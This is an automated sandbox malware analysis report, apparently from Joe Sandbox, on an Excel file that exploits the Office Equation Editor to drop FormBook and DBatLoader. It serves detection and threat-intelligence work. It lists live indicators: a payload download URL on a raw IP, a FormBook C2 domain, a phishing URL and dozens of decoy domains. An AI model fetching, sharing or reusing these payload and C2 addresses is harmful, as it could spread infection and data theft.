Windows Analysis Report 7009.xlsx

Overview

General Information

Sample Name:	7009.xlsx
Analysis ID:	532894
MD5:	8305dc6702f80d7ebe34cd8c63297561
SHA1:	db055cce075213d510de5ca9044ea76036dbcd07
SHA256:	9eae576f7ecc05f106a7cfa605b1ca5bcd02c8d1c2c926920c0d7f0cb605b345
Tags:	FormbookVelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

DBatLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Sigma detected: Droppers Exploiting CVE-2017-11882

Yara detected DBatLoader

Sigma detected: File Dropped By EQNEDT32EXE

Multi AV Scanner detection for dropped file

Maps a DLL or memory area into another process

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Sample uses process hollowing technique

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queues an APC in another process (thread injection)

Machine Learning detection for dropped file

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Contains functionality to detect sleep reduction / modifications

Antivirus or Machine Learning detection for unpacked file

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Downloads executable code via HTTP

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Contains functionality to retrieve information about pressed keystrokes

Drops PE files to the user directory

May check if the current machine is a sandbox (GetTickCount - Sleep)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Yara signature match

Stores large binary data to the registry

Found potential string decryption / allocating functions

Contains functionality to call native functions

Potential document exploit detected (performs DNS queries)

Contains functionality to record screenshots

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Extensive use of GetProcAddress (often used to hide API calls)

Office Equation Editor has been started

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to detect sandboxes (mouse cursor move detection)

Potential document exploit detected (performs HTTP gets)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Signatures

AV Detection:

Antivirus detection for URL or domain

Source: http://www.urzeczenie.com/hno0/?mhcd=MR-LdRqXxT7p86&g6A06=gtNg4Bp0cFA4pVLeRD7vodntk6HewgsZ+AnpdRhteKnDm7bsVUj6fD8/RHuCSiZlcACYig==	Avira URL Cloud: Label: malware
Source: http://13.250.31.113/7009/binso.exe	Avira URL Cloud: Label: malware
Source: www.heidecide.xyz/hno0/	Avira URL Cloud: Label: phishing

Found malware configuration

Source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.heidecide.xyz/hno0/"], "decoy": ["526854.rest", "loosesalatoyof2.xyz", "drillshear.com", "kdsh-uae.com", "firstnetinsurance.net", "28684dw.com", "hikinglifekr.com", "astramed-clinic.store", "24hxinh.com", "livebongdatv.net", "henrymaskph.com", "newlanlan.com", "txboilerparts.com", "thepurldistrict.com", "changemylifefast.info", "sapphirecloset.com", "ascensionmemberszoom.com", "huffmanworks.com", "techarcstudio.com", "terbulen.store", "naamgem.com", "pwrsearch.com", "al-solaiman.com", "eastrwanda.com", "ruihongco.com", "grandrecordto-gathertoday.info", "bleuexpress.com", "estate.xyz", "intlglobaldelivery.com", "zeneplaza.com", "citiesmalawi.properties", "pumpkincheshire.com", "sunflowerhub.com", "zhongzhenghuagong.com", "aquaticatt.com", "kspqs.com", "cpshapes.com", "fgiheating.com", "primasariutama.com", "hotel-arcosdelparque.com", "benjaminagencymarketing.com", "whiteleyop.xyz", "ahmty.net", "transaction-immo.com", "bungaauraprediction.com", "profumeriamedici.com", "olymporian.com", "uprgoad.com", "negotat.com", "xn--z4qv1cr56dk0k.group", "bestwlz.com", "strongu-miner.com", "presticgroup.com", "cutos2.com", "mintstationery.com", "annengfanglei.com", "carijualpt.com", "chinagxsy.com", "urzeczenie.com", "dianyingyouquanquan.xyz", "voucheraja.com", "sdtcbh.com", "hyslier.com", "siebenmorgenband.com"]}

Multi AV Scanner detection for submitted file

Source: 7009.xlsx	Virustotal: Detection: 35%			Perma Link
Source: 7009.xlsx	ReversingLabs: Detection: 40%

Yara detected FormBook

Source: Yara match	File source: 00000006.00000000.535838106.0000000009304000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563280324.0000000003A70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676416524.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676695619.00000000001B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.676983429.00000000001F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566151978.00000000047EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.561814301.0000000002111000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.563603839.0000000003CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.566701334.00000000049C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.548231693.0000000009304000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\Odhbljup.exe	ReversingLabs: Detection: 35%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 35%

Machine Learning detection for dropped file

Source: C:\Users\user\Odhbljup.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\binso[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 4.3.vbc.exe.315eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.131.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.107.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.165.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50f4.106.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.33154c.246.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310e80.52.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3152c8.112.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d710a4.42.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cebffc.148.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d1ac.249.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79768.59.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.39.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.139.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ca4.264.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70008.71.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.74.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cdcd68.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced598.275.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64370.24.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cefb84.27.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.9.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.90.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31914c.181.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b18.61.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cf84.239.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3292e0.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81f44.282.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.217.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e368.15.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe610.133.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.34.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.30cd68.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e610.133.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331c54.260.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec008.207.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.268.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331ef4.277.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.319308.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318b08.37.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318d98.156.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d010fc.238.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.126.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60e80.53.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32d0a8.94.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d685dc.151.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.205.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec8e4.215.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cece70.235.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.130.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced594.281.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31932c.197.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f0.271.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32e0c8.115.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68b08.36.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0b08.35.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321414.55.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.68.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71894.11.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9f90.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329c94.206.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7f438.209.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329f90.12.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.268.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.5.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf4008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7e2fc.123.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314008.64.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d594.279.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01f44.282.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.209.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321b2c.121.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8d98.157.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f0.273.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.147.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81b78.257.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d598.275.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.79.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ef4.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6932c.191.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.100.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d792e0.46.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf93d4.174.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31459c.33.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31943c.203.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d60eec.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.80.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.167.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d8058c.216.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd0a8.92.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.142.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.212.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.185.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d71b2c.122.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c8e0.221.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.245.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce943c.203.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cd5c.233.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.32b840.150.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.332764.18.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b88.82.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ced448.260.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64d5c.88.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3210a4.44.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331f44.281.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cf84.239.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.199.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0154c.246.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.213.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b88.80.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dfc.274.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310c38.38.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80ed4.234.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf9768.59.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cec3b0.211.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.68.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d80008.213.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf1b2c.121.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9f80.26.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4b84.85.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.324008.145.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4f28.98.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31d594.279.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3143b0.70.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330ed4.233.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cd5c.231.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf5be4.10.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.266.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d1ac.248.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.156.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68fdc.173.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce932c.197.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.321d44.129.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01ca4.265.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf3014.137.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d643b0.69.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.224.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d68e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b78.257.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfdb70.110.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfd60c.102.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.3148e0.78.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce4d5c.88.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.214.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.330008.212.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6943c.204.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.331324.242.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d5a0.7.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf96b4.182.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d620.283.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0e80.52.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9258.187.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d79f90.13.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.36.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d64f28.97.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d4f4.267.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cecb88.223.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6c3b0.211.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6911c.56.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315e2c.140.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.314b84.84.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce43b0.70.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01b18.60.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cfe368.16.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d70ed4.92.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329938.189.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf92e0.43.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce50cc.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d65eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d598.277.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315494.128.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.310b08.34.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce8e6c.161.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81ef4.276.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5eec.144.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0199c.254.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.315eec.146.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d0058c.216.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31c008.207.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01dfc.272.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31fffc.32.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d81dac.269.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a74.201.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.323ffc.86.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce5e30.138.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d652c8.113.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d444.264.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1d01c54.262.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.31cb84.227.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7126c.98.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce0eec.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6cb84.229.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d74008.79.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf8fb8.159.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d69308.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.175.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cef438.65.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.318fdc.173.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d650cc.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cff438.208.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d6d734.287.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7d60c.99.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 7.3.Odhbljup.exe.1d7909c.162.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1ce9308.6.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 10.3.Odhbljup.exe.1cf058c.75.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.329a1c.193.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 4.3.vbc.exe.328008.154.unpack	Avira: Label: TR/Patched.Ren.Gen
